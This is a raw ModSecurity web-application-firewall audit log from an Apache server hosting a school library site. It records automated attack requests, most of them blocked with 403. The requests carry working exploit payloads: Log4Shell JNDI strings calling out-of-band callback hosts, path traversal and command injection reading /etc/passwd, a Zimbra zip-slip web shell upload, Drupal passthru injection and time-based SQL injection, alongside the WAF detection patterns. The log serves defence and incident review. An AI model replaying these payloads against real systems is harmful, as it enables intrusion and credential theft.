p2=2521, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf32953-Z-- --0f48973b-A-- [27/May/2025:03:48:18 +0700] aDTTkt6cNBpj1JOkpQk_fAAAAEo 103.236.140.4 55668 103.236.140.4 8181 --0f48973b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168409233 --0f48973b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f48973b-E-- --0f48973b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748292498100246 2713 (- - -) Stopwatch2: 1748292498100246 2713; combined=667, p1=503, p2=129, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f48973b-Z-- --39b10122-A-- [27/May/2025:03:48:23 +0700] aDTTl96cNBpj1JOkpQk_fQAAAE0 103.236.140.4 55674 103.236.140.4 8181 --39b10122-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168967365 --39b10122-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39b10122-E-- --39b10122-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748292503120054 3170 (- - -) Stopwatch2: 1748292503120054 3170; combined=760, p1=568, p2=131, p3=0, p4=0, p5=61, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39b10122-Z-- --9b8d0b24-A-- [27/May/2025:04:33:19 +0700] aDTeHxLFq2VRfSzm6b8G2QAAAJc 103.236.140.4 36724 103.236.140.4 8181 --9b8d0b24-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0q9cd1gpeook7mlf7sg7tqja1jyicqic.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0q9cd1gpeook7mlf7sgho969p7ie1orz.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0q9cd1gpeook7mlf7sgquptt8jk3wmt5.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgt6qrneumb94we.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgfyifxe3qyj9an.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sgo8x6sd8njnrab.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sgxt86jbjhmcxsz.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0q9cd1gpeook7mlf7sg6ef6sowy5xzmz.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0q9cd1gpeook7mlf7sgm3bys775z64jj.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sgjxkftbjphzi6o.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgeso7reekmbwho.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgz8d6w1crusqfh.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgjzges7n7nnur3.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgnq9umw5fsqxhm.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgsgmo4y98fm3ou.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0q9cd1gpeook7mlf7sg85ex4ntxbwy4n.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168411311 --9b8d0b24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b8d0b24-E-- --9b8d0b24-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295199462902 6389 (- - -) Stopwatch2: 1748295199462902 6389; combined=4463, p1=458, p2=3974, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b8d0b24-Z-- --c0619217-A-- [27/May/2025:04:33:20 +0700] aDTeIFuSH_Spa4YU2ZmmVwAAAMk 103.236.140.4 36750 103.236.140.4 8181 --c0619217-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/108.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168996447 --c0619217-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --c0619217-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0619217-E-- --c0619217-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748295200103906 1848 (- - -) Stopwatch2: 1748295200103906 1848; combined=517, p1=353, p2=135, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0619217-Z-- --a41ed057-A-- [27/May/2025:04:33:20 +0700] aDTeIN6cNBpj1JOkpQlEbQAAAEU 103.236.140.4 36738 103.236.140.4 8181 --a41ed057-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 168411314 --a41ed057-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --a41ed057-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a41ed057-E-- --a41ed057-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200102998 3143 (- - -) Stopwatch2: 1748295200102998 3143; combined=1690, p1=449, p2=1216, p3=0, p4=0, p5=25, sr=153, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41ed057-Z-- --d0c1c753-A-- [27/May/2025:04:33:20 +0700] aDTeIN6cNBpj1JOkpQlEbgAAAEM 103.236.140.4 36740 103.236.140.4 8181 --d0c1c753-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511191 --d0c1c753-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --d0c1c753-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c1c753-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200102998 3933 (- - -) Stopwatch2: 1748295200102998 3933; combined=2433, p1=317, p2=2097, p3=0, p4=0, p5=19, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c1c753-Z-- --7f592c16-A-- [27/May/2025:04:33:20 +0700] aDTeIFuSH_Spa4YU2ZmmWQAAAMs 103.236.140.4 36782 103.236.140.4 8181 --7f592c16-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164701893 --7f592c16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f592c16-E-- --7f592c16-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200122230 2958 (- - -) Stopwatch2: 1748295200122230 2958; combined=1631, p1=327, p2=1275, p3=0, p4=0, p5=28, sr=96, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f592c16-Z-- --cc62216c-A-- [27/May/2025:04:33:20 +0700] aDTeIBLFq2VRfSzm6b8G3gAAAIQ 103.236.140.4 36788 103.236.140.4 8181 --cc62216c-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166635702 --cc62216c-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --cc62216c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc62216c-E-- --cc62216c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748295200122973 5591 (- - -) Stopwatch2: 1748295200122973 5591; combined=4214, p1=415, p2=3758, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc62216c-Z-- --e1b8bd35-A-- [27/May/2025:04:33:37 +0700] aDTeMRLFq2VRfSzm6b8HCgAAAIw 103.236.140.4 36929 103.236.140.4 8181 --e1b8bd35-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166166633 --e1b8bd35-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --8aee133b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aee133b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748296116398941 4237 (- - -) Stopwatch2: 1748296116398941 4237; combined=3129, p1=349, p2=2701, p3=22, p4=21, p5=36, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aee133b-Z-- --a3b29d67-A-- [27/May/2025:04:48:36 +0700] aDThtGTuEZUBy5rh0sZ58QAAAAo 103.236.140.4 43282 103.236.140.4 8181 --a3b29d67-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167871111 --a3b29d67-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --a3b29d67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3b29d67-E-- --a3b29d67-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296116416277 1576 (- - -) Stopwatch2: 1748296116416277 1576; combined=528, p1=303, p2=201, p3=0, p4=0, p5=24, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3b29d67-Z-- --734c4342-A-- [27/May/2025:04:48:36 +0700] aDThtGTuEZUBy5rh0sZ58gAAAA0 103.236.140.4 43286 103.236.140.4 8181 --734c4342-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760041 --734c4342-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --734c4342-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --734c4342-E-- --734c4342-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748296116416716 3866 (- - -) Stopwatch2: 1748296116416716 3866; combined=2861, p1=309, p2=2489, p3=19, p4=21, p5=22, sr=59, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --734c4342-Z-- --bfb2d75d-A-- [27/May/2025:04:50:04 +0700] aDTiDGTuEZUBy5rh0sZ5-wAAAAM 103.236.140.4 43882 103.236.140.4 8181 --bfb2d75d-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id 